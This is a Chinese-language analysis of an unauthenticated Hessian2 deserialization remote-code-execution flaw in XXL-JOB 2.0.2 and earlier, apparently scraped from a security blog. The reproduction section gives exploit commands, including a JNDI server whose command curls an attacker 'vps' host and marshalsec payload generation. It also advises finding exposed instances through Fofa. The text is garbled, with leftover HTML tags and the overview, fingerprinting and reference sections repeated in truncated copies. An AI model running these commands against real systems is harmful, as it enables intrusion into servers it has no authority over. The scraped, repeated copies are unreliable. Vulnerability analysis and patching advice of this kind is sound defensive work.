XXL-JOB API未授权Hessian2反序列化漏洞分析<\/h1>

漏洞概述<\/h2>
XXL-JOB是一个分布式任务调度平台，在2.0.2及以下版本中，JobApiController#api接口存在未授权访问漏洞，同时该接口使用Hessian2反序列化处理请求数据，导致攻击者可以构造恶意序列化数据实现远程代码执行。<\/p>

影响版本<\/h2>
XXL-JOB < 2.0.2<\/p>

漏洞分析<\/h2>

未授权访问<\/h3>

在低版本XXL-JOB中，JobApiController#api<\/code>接口使用了@PermessionLimit(limit=false)<\/code>注解，这意味着访问该接口不需要任何鉴权：<\/p>

@PermessionLimit<\/span>(<\/span>limit=<\/span>false<\/span>)<\/span>
<\/span><\/span>public<\/span> ReturnT<<\/span>String><\/span> api<\/span>(<\/span>HttpServletRequest request,<\/span> @RequestBody<\/span>(<\/span>required =<\/span> false<\/span>)<\/span> String data)<\/span> {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>Hessian2反序列化链<\/h3>
请求处理流程如下：<\/p>

请求到达JobApiController#api<\/code>接口<\/li>
调用invokeAdminService<\/code>处理请求数据<\/li>
进入XxlJobDynamicScheduler.invokeAdminService<\/code><\/li>
最终到达ServletServerHandler.handle<\/code>方法<\/li>
调用parseRequest<\/code>处理request对象<\/li>
通过readBytes<\/code>读取请求数据<\/li>
使用Hessian2反序列化请求数据(requestBytes<\/code>)<\/li>
<\/ol>
JNDI注入绕过<\/h3>
在高版本JDK中，JNDI注入受到限制（限制远程类加载），表现为RMI\/LDAP服务收到请求但HTTP服务无响应。绕过思路：<\/p>

在CLASSPATH中寻找工厂类<\/li>
对引用的Reference属性添加危险方法或属性<\/li>
这些危险方法也需要存在于CLASSPATH中<\/li>
<\/ol>
XXL-JOB基于Spring框架，底层使用Tomcat服务器，可以利用Tomcat中的org.apache.naming.factory.BeanFactory<\/code>类，结合javax.el.ELProcessor<\/code>执行任意代码。<\/p>
漏洞复现<\/h2>
环境准备<\/h3>

XXL-JOB 2.0.2<\/li>
JDK 8u191<\/li>
Linux环境<\/li>
<\/ol>
利用工具<\/h3>
使用JNDI-Injection-Exploit<\/a>工具生成payload：<\/p>
# 启动JNDI服务<\/span>
<\/span><\/span>java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "curl vps:8817"<\/span>
<\/span><\/span>
<\/span><\/span># 生成Hessian2 payload<\/span>
<\/span><\/span>java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian2 SpringAbstractBeanFactoryPointcutAdvisor [<\/span>rmi服务]<\/span> > ~\/Desktop\/test13.ser
<\/span><\/span><\/code><\/pre>指纹识别<\/h3>
在Fofa等搜索引擎上寻找XXL-JOB实例，访问\/api<\/code>接口会返回特定错误信息。<\/p>
修复建议<\/h2>

升级XXL-JOB到最新版本<\/li>
对\/api<\/code>接口添加访问控制<\/li>
使用白名单限制可访问IP<\/li>
升级JDK版本并配置安全参数<\/li>
<\/ol>
参考链接<\/h2>

JNDI注入利用研究<\/a><\/li>
JNDI-Injection-Exploit工具<\/a><\/li>
XXL-JOB GitHub仓库<\/a><\/li>
<\/ol>

XXL-JOB API未授权Hessian2反序列化漏洞分析<\/h1>

漏洞概述<\/h2> XXL-JOB是一个分布式任务调度平台，在2.0.2及以下版本中，JobApiController#api接口存在未授权访问漏洞，同时该接口使用Hessian2反序列化处理请求数据，导致攻击者可以构造恶意序列化数据实现远程代码执行。<\/p>

影响版本<\/h2> XXL-JOB < 2.0.2<\/p>

漏洞分析<\/h2>

指纹识别<\/h3> 在Fofa等搜索引擎上寻找XXL-JOB实例，访问\/api<\/code>接口会返回特定错误信息。<\/p>

修复建议<\/h2> 升级XXL-JOB到最新版本<\/li> 对\/api<\/code>接口添加访问控制<\/li> 使用白名单限制可访问IP<\/li>

参考链接<\/h2> JNDI注入利用研究<\/a><\/li> JNDI-Injection-Exploit工具<\/a><\/li> XXL-JOB GitHub仓库<\/a><\/li> <\/ol>

漏洞概述<\/h2>
XXL-JOB是一个分布式任务调度平台，在2.0.2及以下版本中，JobApiController#api接口存在未授权访问漏洞，同时该接口使用Hessian2反序列化处理请求数据，导致攻击者可以构造恶意序列化数据实现远程代码执行。<\/p>

影响版本<\/h2>
XXL-JOB < 2.0.2<\/p>

指纹识别<\/h3>
在Fofa等搜索引擎上寻找XXL-JOB实例，访问`\/api<\/code>接口会返回特定错误信息。<\/p>`

参考链接<\/h2>

JNDI注入利用研究<\/a><\/li>
JNDI-Injection-Exploit工具<\/a><\/li>
XXL-JOB GitHub仓库<\/a><\/li> <\/ol>